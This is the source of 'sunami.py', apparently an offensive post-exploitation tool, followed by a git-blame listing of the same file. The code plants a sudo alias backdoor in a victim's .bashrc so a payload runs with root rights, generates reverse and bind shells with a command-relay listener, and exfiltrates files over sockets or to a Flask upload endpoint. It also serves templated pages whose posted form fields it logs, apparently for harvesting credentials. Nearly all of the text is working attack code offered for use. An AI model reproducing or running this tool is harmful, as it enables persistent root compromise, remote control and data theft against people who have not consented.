SUnami/sunami.py

import lib.payloads as payloads
import lib.parsing as parsing
import lib.banner
import socket
import os
import sys
import time
print(lib.banner.subanner)
args=parsing.parser()
result=""
escapedres=""

def routeres(comm, local):
	match local:
		case "0":
			display(comm)
		case "1":
			localexec(comm)

def display(comm):
	result=f"alias sudo=\"sudo {comm} sudo\";"
	pastetemp=f"paste the following into the infected sudoers .bashrc file:\n\t{result}"
	escapedres=result.replace("\"","\\\"")
	runtemp=f"or run the following command:\n\techo \"{escapedres}\" >> $HOME/.bashrc\n"
	print(pastetemp)
	print(runtemp)

def localexec(comm):
	result=f"alias sudo=\"sudo {comm} sudo\";"
	home=os.environ["HOME"]
	with open(f"{home}/.bashrc","a") as rc:
		rc.write(f"\n{result}")


def genshell(ip, port, protocol, shelltype, shell):
	if shelltype == "bind":
		return payloads.func_dict2[shell](ip, port, protocol)
	else:
		return payloads.func_dict[shell](ip, port, protocol)

if args.command == "genshell":
	cmd=""
	comm=genshell(args.ip, args.port, args.protocol, args.shelltype, args.shell)
	routeres(comm,args.local)
	if args.listen == "1":
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.bind((args.ip, int(args.port)))
			s.listen(1)
			conn, addr = s.accept()
			with conn:
				while True:
					data = conn.recv(1024).decode("utf-8")
					sys.stdout.write(data)
					cmd=input()
					cmd+="\n"
					conn.send(cmd.encode("utf-8"))
					time.sleep(1)
					sys.stdout.write("\033[A" + data.split("\n")[-1])
	elif args.shelltype == "rev":
		print(f"on your machine run the following:\n\tnc -lnvp {args.port}")
	else:
		print(f"on your machine run the following:\n\tnc {args.ip} {args.port}")
	
if args.command == "exfilfile":
	if args.method == "postflask":
		comm=payloads.Exfil.pflask(args.ip, args.port, args.file)
		routeres(comm, args.local)
		from flask import Flask, request
		app = Flask(__name__)
		@app.route("/up",methods=["POST"])
		def upl():
			if request.files["file"]:
				print(request.files["file"].read())
			return ""
		if __name__ == "__main__":
			app.run(host=args.ip, port=int(args.port))

	else:
		comm=payloads.Exfil.socket(args.ip, args.port, args.file)
		routeres(comm,args.local)

	if args.method == "pysocket":
		with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
			s.bind((args.ip, int(args.port)))
			s.listen()
			conn, addr = s.accept()
			with conn:
				while True:
					data = conn.recv(1024)
					if data:
						print(data)
						break
							
	if args.method == "nc":
		print(f"on your machine run the following:\n\tnc -lnvp {args.port}")

if args.command == "rfs":
	comm=payloads.RFS.run(args.ip, args.port, args.schema)
	routeres(comm,args.local)
	from flask import Flask, request, render_template
	app = Flask(__name__)
	@app.route("/rfs",methods=["GET"])
	def rfs(rfvs=args.vars):
		if rfvs:
			rfsvars={v.split(":",1)[0]:v.split(":",1)[1] for v in rfvs}
		else:
			rfsvars=""
		return render_template(os.path.join("rfs",args.file),rfsvars=rfsvars)
	@app.route("/l",methods=["POST"])
	def listen():
		for key in request.form.keys():
			print(f"{key}:{request.form[key]}")
		return ""
	if __name__ == "__main__":
		app.run(host=args.ip, port=int(args.port))
Add files via upload 2023-06-11 21:40:23 +00:00			`import lib.payloads as payloads`
			`import lib.parsing as parsing`
			`import lib.banner`
			`import socket`
			`import os`
			`import sys`
			`import time`
			`print(lib.banner.subanner)`
			`args=parsing.parser()`
			`result=""`
			`escapedres=""`

			`def routeres(comm, local):`
			`match local:`
			`case "0":`
			`display(comm)`
			`case "1":`
			`localexec(comm)`

			`def display(comm):`
			`result=f"alias sudo=\"sudo {comm} sudo\";"`
			`pastetemp=f"paste the following into the infected sudoers .bashrc file:\n\t{result}"`
			`escapedres=result.replace("\"","\\\"")`
			`runtemp=f"or run the following command:\n\techo \"{escapedres}\" >> $HOME/.bashrc\n"`
			`print(pastetemp)`
			`print(runtemp)`

			`def localexec(comm):`
			`result=f"alias sudo=\"sudo {comm} sudo\";"`
			`home=os.environ["HOME"]`
			`with open(f"{home}/.bashrc","a") as rc:`
			`rc.write(f"\n{result}")`

Update sunami.py 2023-08-06 15:21:10 +00:00

			`def genshell(ip, port, protocol, shelltype, shell):`
			`if shelltype == "bind":`
			`return payloads.func_dict2[shell](ip, port, protocol)`
			`else:`
			`return payloads.func_dict[shell](ip, port, protocol)`

Add files via upload 2023-06-11 21:40:23 +00:00			`if args.command == "genshell":`
			`cmd=""`
Update sunami.py 2023-08-06 15:21:10 +00:00			`comm=genshell(args.ip, args.port, args.protocol, args.shelltype, args.shell)`
Add files via upload 2023-06-11 21:40:23 +00:00			`routeres(comm,args.local)`
			`if args.listen == "1":`
			`with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:`
			`s.bind((args.ip, int(args.port)))`
			`s.listen(1)`
			`conn, addr = s.accept()`
			`with conn:`
			`while True:`
			`data = conn.recv(1024).decode("utf-8")`
			`sys.stdout.write(data)`
			`cmd=input()`
			`cmd+="\n"`
			`conn.send(cmd.encode("utf-8"))`
			`time.sleep(1)`
			`sys.stdout.write("\033[A" + data.split("\n")[-1])`
Update sunami.py 2023-08-06 15:32:33 +00:00			`elif args.shelltype == "rev":`
Update sunami.py 2023-08-06 15:21:10 +00:00			`print(f"on your machine run the following:\n\tnc -lnvp {args.port}")`
Update sunami.py 2023-08-06 15:31:32 +00:00			`else:`
			`print(f"on your machine run the following:\n\tnc {args.ip} {args.port}")`
Add files via upload 2023-06-11 21:40:23 +00:00
			`if args.command == "exfilfile":`
			`if args.method == "postflask":`
			`comm=payloads.Exfil.pflask(args.ip, args.port, args.file)`
			`routeres(comm, args.local)`
			`from flask import Flask, request`
			`app = Flask(__name__)`
			`@app.route("/up",methods=["POST"])`
			`def upl():`
			`if request.files["file"]:`
			`print(request.files["file"].read())`
			`return ""`
			`if __name__ == "__main__":`
			`app.run(host=args.ip, port=int(args.port))`

			`else:`
			`comm=payloads.Exfil.socket(args.ip, args.port, args.file)`
			`routeres(comm,args.local)`

			`if args.method == "pysocket":`
			`with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:`
			`s.bind((args.ip, int(args.port)))`
			`s.listen()`
			`conn, addr = s.accept()`
			`with conn:`
			`while True:`
			`data = conn.recv(1024)`
			`if data:`
			`print(data)`
			`break`

			`if args.method == "nc":`
Update sunami.py 2023-08-06 15:21:10 +00:00			`print(f"on your machine run the following:\n\tnc -lnvp {args.port}")`
Update sunami.py 2023-07-09 09:58:30 +00:00
			`if args.command == "rfs":`
			`comm=payloads.RFS.run(args.ip, args.port, args.schema)`
			`routeres(comm,args.local)`
			`from flask import Flask, request, render_template`
			`app = Flask(__name__)`
			`@app.route("/rfs",methods=["GET"])`
			`def rfs(rfvs=args.vars):`
Update sunami.py 2023-07-09 10:07:00 +00:00			`if rfvs:`
			`rfsvars={v.split(":",1)[0]:v.split(":",1)[1] for v in rfvs}`
			`else:`
			`rfsvars=""`
Update sunami.py 2023-07-09 09:58:30 +00:00			`return render_template(os.path.join("rfs",args.file),rfsvars=rfsvars)`
			`@app.route("/l",methods=["POST"])`
			`def listen():`
			`for key in request.form.keys():`
			`print(f"{key}:{request.form[key]}")`
			`return ""`
			`if __name__ == "__main__":`
			`app.run(host=args.ip, port=int(args.port))`